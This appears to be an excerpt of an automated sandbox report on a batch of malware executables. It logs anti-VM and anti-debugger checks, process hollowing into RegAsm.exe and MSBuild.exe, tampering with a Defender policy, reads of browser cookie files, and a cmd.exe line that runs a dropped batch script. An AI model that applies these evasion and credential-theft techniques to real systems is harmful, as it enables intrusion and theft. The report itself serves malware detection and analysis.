Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: svchost.exe, 00000003.00000002.2868341771.000001AC23602000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: VMWare
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.000000000184E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\Desktop\WlCIinu0yp.exe System information queried: ModuleInformation
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\WlCIinu0yp.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Open window title or class name: regmonclass
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Open window title or class name: ollydbg
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Open window title or class name: filemonclass
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Process queried: DebugObjectHandle
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Process queried: DebugObjectHandle
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00418BB0 LoadLibraryA,GetProcAddress, 7_2_00418BB0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004160B0 mov ecx, dword ptr fs:[00000030h] 7_2_004160B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0045D9F0 mov eax, dword ptr fs:[00000030h] 7_2_0045D9F0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0045D9F0 mov eax, dword ptr fs:[00000030h] 7_2_0045D9F0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0041AB90 mov eax, dword ptr fs:[00000030h] 7_2_0041AB90
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004146B0 mov eax, dword ptr fs:[00000030h] 7_2_004146B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004094C0 OutputDebugStringA,GetModuleHandleA,GetProcAddress,GetProcessHeap,RtlAllocateHeap,HeapFree,RtlAllocateHeap,HeapFree, 7_2_004094C0
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Registry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe NtProtectVirtualMemory: Direct from: 0x140FC862F
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe NtProtectVirtualMemory: Direct from: 0x14101446D
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe NtOpenFile: Direct from: 0x140FBB569
Source: C:\Users\user\Desktop\WlCIinu0yp.exe NtSetInformationThread: Indirect: 0x1406B2FDA
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe NtProtectVirtualMemory: Direct from: 0x141036FB5
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe NtProtectVirtualMemory: Direct from: 0x140FE889D
Source: C:\Users\user\Desktop\WlCIinu0yp.exe NtQueryInformationProcess: Indirect: 0x1406A0768
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe NtProtectVirtualMemory: Direct from: 0x14102BFF1
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe NtProtectVirtualMemory: Indirect: 0x140F595B5
Source: C:\Users\user\Desktop\WlCIinu0yp.exe NtQueryInformationProcess: Indirect: 0x1406A0615
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe NtUnmapViewOfSection: Direct from: 0x141037F5D
Source: C:\Users\user\Desktop\WlCIinu0yp.exe NtQuerySystemInformation: Indirect: 0x140648961
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe NtProtectVirtualMemory: Direct from: 0x14100CB88
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe NtClose: Direct from: 0x141019C6D
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe NtProtectVirtualMemory: Direct from: 0x140F63C2D
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe NtProtectVirtualMemory: Direct from: 0x1416AD85D
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Section unmapped: unknown base address: 400000
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 456000
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 48E000
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E07008
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AD7008
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 420000
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8E7008
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Guests Guests.cmd & Guests.cmd & exit
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe Process created: unknown unknown
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1990019840.000000000271C000.00000004.00000020.00020000.00000000.sdmp, Biographies.13.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Queries volume information: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Queries volume information: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
